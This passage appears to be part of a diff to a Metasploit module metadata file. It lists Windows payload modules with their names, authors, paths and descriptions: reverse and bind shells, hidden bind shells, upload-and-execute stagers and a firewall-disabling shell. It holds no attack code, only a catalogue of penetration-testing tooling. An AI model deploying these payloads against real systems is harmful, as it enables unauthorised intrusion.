null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", + "is_install_path": true, + "ref_name": "windows/shell/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/reverse_nonx_tcp" + }, + "payload_windows/shell/reverse_ord_tcp": { + "name": "Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)", + "fullname": "payload/windows/shell/reverse_ord_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "spoonm ", + "sf " + ], + "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", + "is_install_path": true, + "ref_name": "windows/shell/reverse_ord_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/reverse_ord_tcp" + }, + "payload_windows/shell/reverse_tcp": { + "name": "Windows Command Shell, Reverse TCP Stager", + "fullname": "payload/windows/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "spoonm ", + "sf ", + "hdm ", + "skape " + ], + "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": 
"2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/reverse_tcp" + }, + "payload_windows/shell/reverse_tcp_allports": { + "name": "Windows Command Shell, Reverse All-Port TCP Stager", + "fullname": "payload/windows/shell/reverse_tcp_allports", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "spoonm ", + "sf ", + "hdm ", + "skape " + ], + "description": "Spawn a piped command shell (staged).\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", + "is_install_path": true, + "ref_name": "windows/shell/reverse_tcp_allports", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/reverse_tcp_allports" + }, + "payload_windows/shell/reverse_tcp_dns": { + "name": "Windows Command Shell, Reverse TCP Stager (DNS)", + "fullname": "payload/windows/shell/reverse_tcp_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "spoonm ", + "sf ", + "hdm ", + "skape ", + "RageLtMan" + ], + "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + 
"autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", + "is_install_path": true, + "ref_name": "windows/shell/reverse_tcp_dns", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/reverse_tcp_dns" + }, + "payload_windows/shell/reverse_tcp_rc4": { + "name": "Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/shell/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "spoonm ", + "sf ", + "hdm ", + "skape ", + "mihi", + "RageLtMan" + ], + "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/shell/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/reverse_tcp_rc4" + }, + "payload_windows/shell/reverse_tcp_rc4_dns": { + "name": "Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", + "fullname": "payload/windows/shell/reverse_tcp_rc4_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "spoonm ", + "sf ", + "hdm ", + "skape ", + "mihi", + "RageLtMan" + ], + "description": "Spawn a piped command shell 
(staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", + "is_install_path": true, + "ref_name": "windows/shell/reverse_tcp_rc4_dns", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/reverse_tcp_rc4_dns" + }, + "payload_windows/shell/reverse_tcp_uuid": { + "name": "Windows Command Shell, Reverse TCP Stager with UUID Support", + "fullname": "payload/windows/shell/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "spoonm ", + "sf ", + "hdm ", + "OJ Reeves" + ], + "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker with UUID Support", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/shell/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/reverse_tcp_uuid" + }, + "payload_windows/shell/reverse_udp": { + "name": "Windows Command Shell, Reverse UDP Stager with UUID Support", + "fullname": "payload/windows/shell/reverse_udp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "spoonm ", + "sf ", + "RageLtMan " + ], + 
"description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker with UUID Support", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_udp.rb", + "is_install_path": true, + "ref_name": "windows/shell/reverse_udp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/reverse_udp" + }, + "payload_windows/shell_bind_tcp": { + "name": "Windows Command Shell, Bind TCP Inline", + "fullname": "payload/windows/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "sf " + ], + "description": "Listen for a connection and spawn a command shell", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "windows/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/shell_bind_tcp_xpfw": { + "name": "Windows Disable Windows ICF, Command Shell, Bind TCP Inline", + "fullname": "payload/windows/shell_bind_tcp_xpfw", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Lin0xx " + ], + "description": "Disable the Windows ICF, then listen for a connection and spawn a command shell", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, 
+ "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb", + "is_install_path": true, + "ref_name": "windows/shell_bind_tcp_xpfw", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/shell_hidden_bind_tcp": { + "name": "Windows Command Shell, Hidden Bind TCP Inline", + "fullname": "payload/windows/shell_hidden_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "sd", + "Borja Merino " + ], + "description": "Listen for a connection from certain IP and spawn a command shell.\n The shellcode will reply with a RST packet if the connections is not\n coming from the IP defined in AHOST. This way the port will appear\n as \"closed\" helping us to hide the shellcode.", + "references": [ + "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb", + "is_install_path": true, + "ref_name": "windows/shell_hidden_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/shell_reverse_tcp": { + "name": "Windows Command Shell, Reverse TCP Inline", + "fullname": "payload/windows/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "sf " + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + 
"platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/speak_pwned": { + "name": "Windows Speech API - Say \"You Got Pwned!\"", + "fullname": "payload/windows/speak_pwned", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Berend-Jan \"SkyLined\" Wever " + ], + "description": "Causes the target to say \"You Got Pwned\" via the Windows Speech API", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/speak_pwned.rb", + "is_install_path": true, + "ref_name": "windows/speak_pwned", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/upexec/bind_hidden_ipknock_tcp": { + "name": "Windows Upload/Execute, Hidden Bind Ipknock TCP Stager", + "fullname": "payload/windows/upexec/bind_hidden_ipknock_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "sf ", + "hdm ", + "skape ", + "Borja Merino " + ], + "description": "Uploads an executable and runs it (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). 
After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode", + "references": [ + "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", + "is_install_path": true, + "ref_name": "windows/upexec/bind_hidden_ipknock_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/bind_hidden_ipknock_tcp" + }, + "payload_windows/upexec/bind_hidden_tcp": { + "name": "Windows Upload/Execute, Hidden Bind TCP Stager", + "fullname": "payload/windows/upexec/bind_hidden_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "sf ", + "hdm ", + "skape ", + "Borja Merino " + ], + "description": "Uploads an executable and runs it (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", + "references": [ + "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", + "is_install_path": true, + "ref_name": "windows/upexec/bind_hidden_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": 
"windows/bind_hidden_tcp" + }, + "payload_windows/upexec/bind_ipv6_tcp": { + "name": "Windows Upload/Execute, Bind IPv6 TCP Stager (Windows x86)", + "fullname": "payload/windows/upexec/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "sf ", + "hdm ", + "skape " + ], + "description": "Uploads an executable and runs it (staged).\n\nListen for an IPv6 connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/upexec/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/bind_ipv6_tcp" + }, + "payload_windows/upexec/bind_ipv6_tcp_uuid": { + "name": "Windows Upload/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/windows/upexec/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "sf ", + "hdm ", + "skape ", + "OJ Reeves" + ], + "description": "Uploads an executable and runs it (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/upexec/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, 
+ "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/bind_ipv6_tcp_uuid" + }, + "payload_windows/upexec/bind_named_pipe": { + "name": "Windows Upload/Execute, Windows x86 Bind Named Pipe Stager", + "fullname": "payload/windows/upexec/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "sf ", + "UserExistsError" + ], + "description": "Uploads an executable and runs it (staged).\n\nListen for a pipe connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", + "is_install_path": true, + "ref_name": "windows/upexec/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/bind_named_pipe" + }, + "payload_windows/upexec/bind_nonx_tcp": { + "name": "Windows Upload/Execute, Bind TCP Stager (No NX or Win7)", + "fullname": "payload/windows/upexec/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "sf " + ], + "description": "Uploads an executable and runs it (staged).\n\nListen for a connection (No NX)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", + "is_install_path": true, + "ref_name": "windows/upexec/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + 
"session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/bind_nonx_tcp" + }, + "payload_windows/upexec/bind_tcp": { + "name": "Windows Upload/Execute, Bind TCP Stager (Windows x86)", + "fullname": "payload/windows/upexec/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "sf ", + "hdm ", + "skape " + ], + "description": "Uploads an executable and runs it (staged).\n\nListen for a connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp.rb", + "is_install_path": true, + "ref_name": "windows/upexec/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/bind_tcp" + }, + "payload_windows/upexec/bind_tcp_rc4": { + "name": "Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/upexec/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "sf ", + "hdm ", + "skape ", + "mihi", + "RageLtMan" + ], + "description": "Uploads an executable and runs it (staged).\n\nListen for a connection", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/upexec/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": 
false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/bind_tcp_rc4" + }, + "payload_windows/upexec/bind_tcp_uuid": { + "name": "Windows Upload/Execute, Bind TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/windows/upexec/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "sf ", + "hdm ", + "OJ Reeves" + ], + "description": "Uploads an executable and runs it (staged).\n\nListen for a connection with UUID Support (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/upexec/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/bind_tcp_uuid" + }, + "payload_windows/upexec/find_tag": { + "name": "Windows Upload/Execute, Find Tag Ordinal Stager", + "fullname": "payload/windows/upexec/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "sf ", + "skape " + ], + "description": "Uploads an executable and runs it (staged).\n\nUse an established connection", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/findtag_ord.rb", + "is_install_path": true, + "ref_name": "windows/upexec/find_tag", + "check": false, + "post_auth": false, 
+ "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/findtag_ord" + }, + "payload_windows/upexec/reverse_ipv6_tcp": { + "name": "Windows Upload/Execute, Reverse TCP Stager (IPv6)", + "fullname": "payload/windows/upexec/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "sf ", + "hdm ", + "skape " + ], + "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker over IPv6", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/upexec/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/reverse_ipv6_tcp" + }, + "payload_windows/upexec/reverse_nonx_tcp": { + "name": "Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)", + "fullname": "payload/windows/upexec/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "sf " + ], + "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker (No NX)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", + "is_install_path": true, + "ref_name": "windows/upexec/reverse_nonx_tcp", + 
"check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/reverse_nonx_tcp" + }, + "payload_windows/upexec/reverse_ord_tcp": { + "name": "Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)", + "fullname": "payload/windows/upexec/reverse_ord_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "sf ", + "spoonm " + ], + "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", + "is_install_path": true, + "ref_name": "windows/upexec/reverse_ord_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/reverse_ord_tcp" + }, + "payload_windows/upexec/reverse_tcp": { + "name": "Windows Upload/Execute, Reverse TCP Stager", + "fullname": "payload/windows/upexec/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "sf ", + "hdm ", + "skape " + ], + "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", + "is_install_path": true, + "ref_name": 
"windows/upexec/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/reverse_tcp" + }, + "payload_windows/upexec/reverse_tcp_allports": { + "name": "Windows Upload/Execute, Reverse All-Port TCP Stager", + "fullname": "payload/windows/upexec/reverse_tcp_allports", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "sf ", + "hdm ", + "skape " + ], + "description": "Uploads an executable and runs it (staged).\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", + "is_install_path": true, + "ref_name": "windows/upexec/reverse_tcp_allports", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/reverse_tcp_allports" + }, + "payload_windows/upexec/reverse_tcp_dns": { + "name": "Windows Upload/Execute, Reverse TCP Stager (DNS)", + "fullname": "payload/windows/upexec/reverse_tcp_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "sf ", + "hdm ", + "skape ", + "RageLtMan" + ], + "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + 
"path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", + "is_install_path": true, + "ref_name": "windows/upexec/reverse_tcp_dns", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/reverse_tcp_dns" + }, + "payload_windows/upexec/reverse_tcp_rc4": { + "name": "Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/upexec/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "sf ", + "hdm ", + "skape ", + "mihi", + "RageLtMan" + ], + "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/upexec/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/reverse_tcp_rc4" + }, + "payload_windows/upexec/reverse_tcp_rc4_dns": { + "name": "Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", + "fullname": "payload/windows/upexec/reverse_tcp_rc4_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "sf ", + "hdm ", + "skape ", + "mihi", + "RageLtMan" + ], + "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": 
null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", + "is_install_path": true, + "ref_name": "windows/upexec/reverse_tcp_rc4_dns", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/reverse_tcp_rc4_dns" + }, + "payload_windows/upexec/reverse_tcp_uuid": { + "name": "Windows Upload/Execute, Reverse TCP Stager with UUID Support", + "fullname": "payload/windows/upexec/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "sf ", + "hdm ", + "OJ Reeves" + ], + "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker with UUID Support", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/upexec/reverse_tcp_uuid", + "check": false, + "post_auth": 